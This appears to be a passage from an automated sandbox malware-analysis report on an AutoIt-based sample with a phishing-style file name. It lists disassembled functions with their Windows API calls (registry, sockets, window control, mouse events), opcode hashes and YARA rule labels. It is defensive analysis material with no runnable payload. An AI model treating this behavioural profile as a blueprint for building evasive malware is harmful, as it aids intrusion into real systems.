Part of subcall function 00C3122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C31318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C312E0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 8925e47019a983f6499312799399e90805f4fd54e9f25a24ba736d775a155d4d
Instruction ID: 64f1c54a3daa08b0f9f4ee44cd417ce079ff4e985b7e4f4fcf6a6d5204ab902f
Opcode Fuzzy Hash: 8925e47019a983f6499312799399e90805f4fd54e9f25a24ba736d775a155d4d
Instruction Fuzzy Hash: 08312BB1D21119BFDB149B95DC89AFFB7BCEF08300F040569E912E2151EA749F469AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C3655B
GetWindowLongW.USER32(01578100,000000F0), ref: 00C3658E
GetWindowLongW.USER32(01578100,000000F0), ref: 00C365C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C365F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C3661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00C36630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C3664A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 9a95bfe1b17807fcf8620b3748fa59a5a8c37b9c9bc12c56dfb7c6b61985b853
Instruction ID: f903a30c1c8d9b47e58beaedabe6a6993773fb60c077bb6d1e58270c38bb7a05
Opcode Fuzzy Hash: 9a95bfe1b17807fcf8620b3748fa59a5a8c37b9c9bc12c56dfb7c6b61985b853
Instruction Fuzzy Hash: 1F310230A24210AFDB21CF18DC85F593BE1FB4A350F1881A8F5258B2B6CB71A984DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00C26486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C280CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C264D9
WSAGetLastError.WSOCK32(00000000), ref: 00C264E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C26521
connect.WSOCK32(00000000,?,00000010), ref: 00C2652A
WSAGetLastError.WSOCK32 ref: 00C26534
closesocket.WSOCK32(00000000), ref: 00C2655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C26576

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: dd4f9941917c2c2c65b9ce1b043280f44b0e9095ef3ffe7615f664a51c00b02a
Instruction ID: 16ab7d58e79d9267a59e8512fbfd48891a8999818b622856ffb00ad106411b2a
Opcode Fuzzy Hash: dd4f9941917c2c2c65b9ce1b043280f44b0e9095ef3ffe7615f664a51c00b02a
Instruction Fuzzy Hash: 6E31B131600228AFDB10AF24DC85FBE7BA8EB45714F008069FA55A72D1CB74AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C0E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E120
SysAllocString.OLEAUT32(00000000), ref: 00C0E123
SysAllocString.OLEAUT32 ref: 00C0E144
SysFreeString.OLEAUT32 ref: 00C0E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00C0E167
SysAllocString.OLEAUT32(?), ref: 00C0E175

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: de46f45c0a467eb2aa7e4c98336cfe0d600caffbb9a7a6e900e3b47cc51c57d0
Instruction ID: 5acaeb64eef0681757767ffbaad053caf68c8e5ea0519732ff209137195b52fd
Opcode Fuzzy Hash: de46f45c0a467eb2aa7e4c98336cfe0d600caffbb9a7a6e900e3b47cc51c57d0
Instruction Fuzzy Hash: 1F218635644108AFDB10AFA9DC88EAF77ECEF09760B108539F965CB2A1DA70DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C0FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C0FB81
__wcsnicmp.LIBCMT ref: 00C0FBA2
__wcsnicmp.LIBCMT ref: 00C0FBBC

Strings

#requireadmin, xrefs: 00C0FB9C
#notrayicon, xrefs: 00C0FB79
#OnAutoItStartRegister, xrefs: 00C0FBB6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 8dece0e1e7e39c39aee2c0e2f076553591ae6975c721168a2da17d879b6e3e14
Instruction ID: e99c18e54818e2400c75bbb2aa834b638b31375948952d73fe888bd1b364dc3a
Opcode Fuzzy Hash: 8dece0e1e7e39c39aee2c0e2f076553591ae6975c721168a2da17d879b6e3e14
Instruction Fuzzy Hash: A3212532208151A7E330B624DC13EBBB3D8EF51740F54447EF895866C2EB91AAC3D2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB1D73
Part of subcall function 00BB1D35: GetStockObject.GDI32(00000011), ref: 00BB1D87
Part of subcall function 00BB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C378A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C378AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C378B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C378C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C378D4

Strings

Msctls_Progress32, xrefs: 00C37872

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0959ca4e1c409d3f1b70e09e6d34fca0c37a6ac7f6924fcb8516bebd5ec5cc60
Instruction ID: 31cdd4c0c6c2654df72aff2a6f1397b25fec5ae42140ac6ced77b6dd65f6da83
Opcode Fuzzy Hash: 0959ca4e1c409d3f1b70e09e6d34fca0c37a6ac7f6924fcb8516bebd5ec5cc60
Instruction Fuzzy Hash: 9511B6B2510219BFEF159F64CC85EEB7F6DEF08758F014114F604A6090C7719C21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BD41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BD4292,?), ref: 00BD41E3
GetProcAddress.KERNEL32(00000000), ref: 00BD41EA
EncodePointer.KERNEL32(00000000), ref: 00BD41F6
DecodePointer.KERNEL32(00000001,00BD4292,?), ref: 00BD4213

Strings

combase.dll, xrefs: 00BD41DE
RoInitialize, xrefs: 00BD41D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 9b8178f4a2dd1529e2d8e35f74d934be86325a3546afd36267fa136ba6ecb4ad
Instruction ID: e3d433d7ee1e85e15940e155985508c6a90c64b1936b4061c62d7ec60c3d63ca
Opcode Fuzzy Hash: 9b8178f4a2dd1529e2d8e35f74d934be86325a3546afd36267fa136ba6ecb4ad
Instruction Fuzzy Hash: 20E01AB0AA0300AFEF206FB0EC4AB0C3AA4B720702F904838B415E51B0EBB544D6CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00BD429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BD41B8), ref: 00BD42B8
GetProcAddress.KERNEL32(00000000), ref: 00BD42BF
EncodePointer.KERNEL32(00000000), ref: 00BD42CA
DecodePointer.KERNEL32(00BD41B8), ref: 00BD42E5

Strings

combase.dll, xrefs: 00BD42B3
RoUninitialize, xrefs: 00BD42A7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 7e01b7827931e72fdaa6c896963038a0fecdcf9f48f5d2ee41b95700c2ec0527
Instruction ID: e959d79e78efa1b76363d4fde1b82120faa0312b049cdaa9efb15fa8a1e42343
Opcode Fuzzy Hash: 7e01b7827931e72fdaa6c896963038a0fecdcf9f48f5d2ee41b95700c2ec0527
Instruction Fuzzy Hash: F5E0B678AA1310EBEB54AB70ED0DF0D3AA8B724743F904839F005E11B0DBB54585CA14

Uniqueness

Uniqueness Score: -1.00%

Function 00C1675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C168AD
_memmove.LIBCMT ref: 00C167E8

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

_memmove.LIBCMT ref: 00C1685B
_memmove.LIBCMT ref: 00C16942
_memmove.LIBCMT ref: 00C1695B
_memmove.LIBCMT ref: 00C16977

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 098b8ee0abcba1c93daae97b287bbce549b7c57b5af713911995613890a12945
Instruction ID: d722ba85b0f4e5bd5889b215cc972f8a574dc13dba53cf5d7b31b36ac296f57b
Opcode Fuzzy Hash: 098b8ee0abcba1c93daae97b287bbce549b7c57b5af713911995613890a12945
Instruction Fuzzy Hash: 6761C13050025AABDF11FF64CC81EFE77E4AF45308F044599F9565B292DB709D85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C3046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C30038,?,?), ref: 00C310BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C30588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C305AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C305D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C30617
RegCloseKey.ADVAPI32(00000000), ref: 00C30624

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 29fc91e4a339996cbff33c8fdfeee0dfc67c2e9d77ab866d2613fde9c7e2adb3
Instruction ID: d45d082aac9c1d554180bab70126886ce94df2ad9716b20a2a8fb0a5ea4d30ed
Opcode Fuzzy Hash: 29fc91e4a339996cbff33c8fdfeee0dfc67c2e9d77ab866d2613fde9c7e2adb3
Instruction Fuzzy Hash: 75517A31218200AFCB14EF24C895EAFBBE8FF88304F14495DF555972A1DB71EA05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C35A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C35A82
GetMenuItemCount.USER32(00000000), ref: 00C35AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C35AE1
GetMenuItemID.USER32(?,?), ref: 00C35B50
GetSubMenu.USER32(?,?), ref: 00C35B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C35BAF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: e5047a256d1f0fc9f4040497a22ff59827da0aaf9c15accd59f6bb53d5896c7d
Instruction ID: 0ced9303120dfba317c230f5393b9b2b450556f5c7b2d4bc559b81f727074436
Opcode Fuzzy Hash: e5047a256d1f0fc9f4040497a22ff59827da0aaf9c15accd59f6bb53d5896c7d
Instruction Fuzzy Hash: 8D517C35E00A15AFDF11EFA4C845AAEB7F4EF48314F1044AAE952BB351DB70AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C0F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C0F3F7
VariantClear.OLEAUT32(00000013), ref: 00C0F469
VariantClear.OLEAUT32(00000000), ref: 00C0F4C4
_memmove.LIBCMT ref: 00C0F4EE
VariantClear.OLEAUT32(?), ref: 00C0F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C0F569

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 812e9d169467e867d63019e33950600ea4c3534186b55d1a29e92dcd5681df4e
Instruction ID: 677ef63bdb2f7b21fdd991eddf9a3e1ce9fddbf862cd8bc87d9a6d2bd9e5fc9c
Opcode Fuzzy Hash: 812e9d169467e867d63019e33950600ea4c3534186b55d1a29e92dcd5681df4e
Instruction Fuzzy Hash: 19515CB5A00209AFCB24CF58D884AAAB7B8FF4C314B15856DED59DB340D730E952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C126F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12792
IsMenu.USER32(00000000), ref: 00C127B2
CreatePopupMenu.USER32 ref: 00C127E6
GetMenuItemCount.USER32(000000FF), ref: 00C12844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C12875

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 49ad486add4bf7eabf1869898fdd0008b8f9cbade0ba3696893c97a1bc2b4ffb
Instruction ID: 376b237bc6492a3a81e7f21c3a6de57cfabdf20180a4603fe94eba8a6047f3aa
Opcode Fuzzy Hash: 49ad486add4bf7eabf1869898fdd0008b8f9cbade0ba3696893c97a1bc2b4ffb
Instruction Fuzzy Hash: 4851C079A00205DFEF24CF68D888BEEBBF4EF46314F104169E4219B2D1D7708AA5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00BB179A
GetWindowRect.USER32(?,?), ref: 00BB17FE
ScreenToClient.USER32(?,?), ref: 00BB181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB182C
EndPaint.USER32(?,?), ref: 00BB1876

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 10c8eb9cf04554af4883281da5be38c56ad7472dfec1ef87e221641d00b51667
Instruction ID: d34d91c3fe64a84318da2748ec827c3bcaf8f4168577aab2523a3eaf90c4767e
Opcode Fuzzy Hash: 10c8eb9cf04554af4883281da5be38c56ad7472dfec1ef87e221641d00b51667
Instruction Fuzzy Hash: 8441B070500700AFCB10DF29DC94FBA7BF8FB45724F140AA9F598871A1C7719845DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00C767B0,00000000,01578100,?,?,00C767B0,?,00C3B862,?,?), ref: 00C3B9CC
EnableWindow.USER32(00000000,00000000), ref: 00C3B9F0
ShowWindow.USER32(00C767B0,00000000,01578100,?,?,00C767B0,?,00C3B862,?,?), ref: 00C3BA50
ShowWindow.USER32(00000000,00000004,?,00C3B862,?,?), ref: 00C3BA62
EnableWindow.USER32(00000000,00000001), ref: 00C3BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C3BAA9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 05d74dc817f3ebc077b0a88d92263720aeec1c57c4ec0b504de3ce183c08be47
Instruction ID: 38978ab0f6584bbd3a098147301944f9baaf3229936e6d3ffec6cb27b3c75dbe
Opcode Fuzzy Hash: 05d74dc817f3ebc077b0a88d92263720aeec1c57c4ec0b504de3ce183c08be47
Instruction Fuzzy Hash: 95415E30610641AFDB22CF24C489B997BF0BB05311F1842B9FB688F2A2C731AD46DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C273B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C25134,?,?,00000000,00000001), ref: 00C273BF

Part of subcall function 00C23C94: GetWindowRect.USER32(?,?), ref: 00C23CA7

GetDesktopWindow.USER32 ref: 00C273E9
GetWindowRect.USER32(00000000), ref: 00C273F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C27422

Part of subcall function 00C154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C1555E

GetCursorPos.USER32(?), ref: 00C2744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C274AC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
